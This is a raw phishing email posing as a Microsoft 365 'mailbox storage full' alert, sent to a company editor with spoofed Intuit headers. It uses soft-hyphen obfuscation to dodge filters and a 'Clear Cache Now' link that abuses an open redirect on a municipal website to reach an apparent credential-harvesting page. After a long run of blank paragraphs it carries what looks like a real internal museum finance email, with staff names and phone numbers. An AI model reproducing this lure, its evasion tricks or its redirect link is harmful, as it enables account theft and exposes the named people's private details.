Return-Path: <quickbooks@notification.intuit.com>
Received: from [89.63.5.99] (89.63.5.99) by satipe.disaki.es for <editor@iexpressusa.com>; Wed, 17 Sep 2025 16:45:42 +0200 (envelope-from <quickbooks@notification.intuit.com>)
From: "Outlook Microsoft"<quickbooks@notification.intuit.com>
To: editor@iexpressusa.com
Subject: editor@iexpressusa.com Your mailbox Storage Is Full- 17.9.2025 16:45:42 Contact - editor@iexpressusa.com
Date: 17 Sep 2025 16:45:42 +0200
Message-ID: <20250917164542.AA36768C03CFE0E5@notification.intuit.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML xmlns:o><HEAD></HEAD>
<BODY>
<P align=3Dcenter><FONT color=3D#ff0000 size=3D7>Mi&shy;cr&shy;o&shy;so&shy=
;ft 36&shy;5</FONT></P>
<P align=3Dcenter><FONT color=3D#000000 size=3D4><STRONG>Your Storage Is Fu=
ll editor@iexpressusa.com.</STRONG></FONT></P>
<P align=3Dcenter <BODY>98GB<BUTTON style=3D"HEIGHT: 16px; WIDTH: 380px; CO=
LOR: #ffffff; BACKGROUND-COLOR: #ff0000; border-radius: 4px">
<DIV align=3Dleft></A></A></DIV></BUTTON>100GB</P>
<P align=3Dcenter <BODY></P>
<P align=3Dcenter><STRONG><FONT size=3D4></FONT></STRONG>St&shy;ora&shy;ge =
Qu&shy;ota Ex&shy;ceed&shy;ed.<BR>Yo&shy;u mu&shy;ch im&shy;medi&shy;ate&sh=
y;ly cl&shy;ear your ca&shy;che in or&shy;de&shy;r to se&shy;nd and re&shy;=
cei&shy;ve ne&shy;w m&shy;ai&shy;l&shy;s.</P>
<P align=3Dcenter><A href=3D"https://www.rincondelavictoria.es/c/blogs/find=
_entry?p_l_id=3D0&noSuchEntryRedirect=3Dhttps://khaaswear.com/o/?c3Y9bzM2NV=
8xX25vbSZtPW51JnVpZD1VU0VSMDEwNzIwMjVVMDQwNzAxNTcmdD1FZA=3D=3DN0123Neditor@=
iexpressusa.com">Clear Cache Now</A></P>
<P align=3Dcenter><FONT color=3D#2a2a2a face=3D"Segoe UI"><FONT size=3D4><S=
TRONG>NOTICE: <FONT color=3D#000000 face=3D"Times New Roman">If the cache i=
s not cleared, incoming me&shy;ssage&shy;s will be re&shy;jec&shy;t&shy;ed.=
</FONT></STRONG></FONT></FONT></P>
<P align=3Dcenter>Del&shy;iv&shy;ery Sy&shy;stem iexpressusa.com<A></P></A>=

<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
L);}
w\:* {behavior:url(#default#VML);}
=2Eshape {behavior:url(#default#VML);}
</style><![endif]--><style><!--
/* Font Definitions */
@font-face
        {font-family:"Cambria Math";
        panose<meta http-equiv=3D"Content-Type" content=3D"text/html; chars=
et=3Diso-8859-1">
<meta name=3D"Generator" <!--[if !mso]><style>v\:* {behavior:url(#default#V=
ML);}
o\:* {behavior:url(#default#VMcontent=3D"Microsoft Word 15 (filtered medium=
)">
-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
        {font-family:Calibri;
        panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
        {font-family:Quicksand;
        panose-1:0 0 0 0 0 0 0 0 0 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
        {margin:0cm;
        font-size:11.0pt;
        font-family:"Calibri",sans-serif;
        mso-fareast-language:EN-US;}
span.EmailStyle19
        {mso-style-type:personal-reply;
        font-family:"Arial",sans-serif;
        color:windowtext;}
=2EMsoChpDefault
        {mso-style-type:export-only;
        font-size:10.0pt;}
@page WordSection1
        {size:612.0pt 792.0pt;
        margin:72.0pt 72.0pt 72.0pt 72.0pt;}
div.WordSection1
        {page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext=3D"edit">
<o:idmap v:ext=3D"edit" data=3D"1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang=3D"EN-GB" link=3D"#0563C1" vlink=3D"#954F72" style=3D"word-wrap:=
break-word">
<div class=3D"WordSection1">
<p class=3D"MsoNormal">Hi</p>
<p class=3D"MsoNormal"><span style=3D"font-size:12.0pt;font-family:&quot;Ar=
ial&quot;,sans-serif">See below.<o:p></o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-size:12.0pt;font-family:&quot;Ar=
ial&quot;,sans-serif">I think the outstanding Downs grant (and another??) s=
hould be used as part of the archive development project.<o:p></o:p></span>=
</p>
<p class=3D"MsoNormal"><span style=3D"font-size:12.0pt;font-family:&quot;Ar=
ial&quot;,sans-serif">Best<o:p></o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-size:12.0pt;font-family:&quot;Ar=
ial&quot;,sans-serif">Sue<o:p></o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-size:12.0pt;font-family:&quot;Ar=
ial&quot;,sans-serif"><o:p>&nbsp;</o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-size:12.0pt;font-family:&quot;Ar=
ial&quot;,sans-serif"><o:p>&nbsp;</o:p></span></p>
<p class=3D"MsoNormal">Hi,<o:p></o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal">Can you amend or comment on the text below please, w=
hich is commentary on the restricted funds within the stat accounts.&nbsp; =
You might want to include a note about the PhD?<o:p></o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal" style=3D"margin-bottom:8.0pt;text-autospace:none"><s=
pan style=3D"font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif">Oxf=
ord Knee Archive<o:p></o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-size:10.0pt;font-family:&quot;Ar=
ial&quot;,sans-serif">The Museum received funding of =A310,450 from a varie=
ty of sources (=A35,000 Thackray Medical Research Trust, =A34,450 Friends o=
f Thackray Museum, =A31,000 Thackray Heritage Foundation)
 towards the cataloguing and repackaging of the Oxford Knee Archive donated=
 by Dr J.J. O&#8217;Connor and Mrs H. Goodfellow, widow of the late Dr J. G=
oodfellow. The archive
<span style=3D"color:red">was listed </span>and repackaged in Oxford and wa=
s transported to the Museum in Leeds in 2014.&nbsp;
<span style=3D"color:red">The funds also supported the cost of commissionin=
g an oral history interview with Dr O&#8217;Connor.- was that ever done???&=
nbsp;
</span>In 2017 a further =A35,000 was donated towards this fund, and t<span=
 style=3D"color:red">his</span>, together with the balance brought forward =
from 2016, will be used to develop
<span style=3D"color:red">documentation and a publication by the PhD studen=
t currently working on the collection.
<s>an education resource which makes use of the archive. <o:p></o:p></s></s=
pan></span></p>
<p class=3D"MsoNormal"><s><span style=3D"font-size:12.0pt;font-family:&quot=
;Arial&quot;,sans-serif"><o:p><span style=3D"text-decoration:none">&nbsp;</=
span></o:p></span></s></p>
<p class=3D"MsoNormal"><span style=3D"font-size:10.0pt;font-family:&quot;Ar=
ial&quot;,sans-serif"><o:p>&nbsp;</o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-size:10.0pt;font-family:&quot;Ar=
ial&quot;,sans-serif">Thanks<o:p></o:p></span></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><b><span style=3D"mso-fareast-language:EN-GB">Rachel=
 Emmott<o:p></o:p></span></b></p>
<p class=3D"MsoNormal"><b><span style=3D"mso-fareast-language:EN-GB">Financ=
e Director and Chief Operating Officer<o:p></o:p></span></b></p>
<p class=3D"MsoNormal"><b><span style=3D"mso-fareast-language:EN-GB">Direct=
 line: 0113 205 6523&nbsp; Mobile: 07734824450<o:p></o:p></span></b></p>
<p class=3D
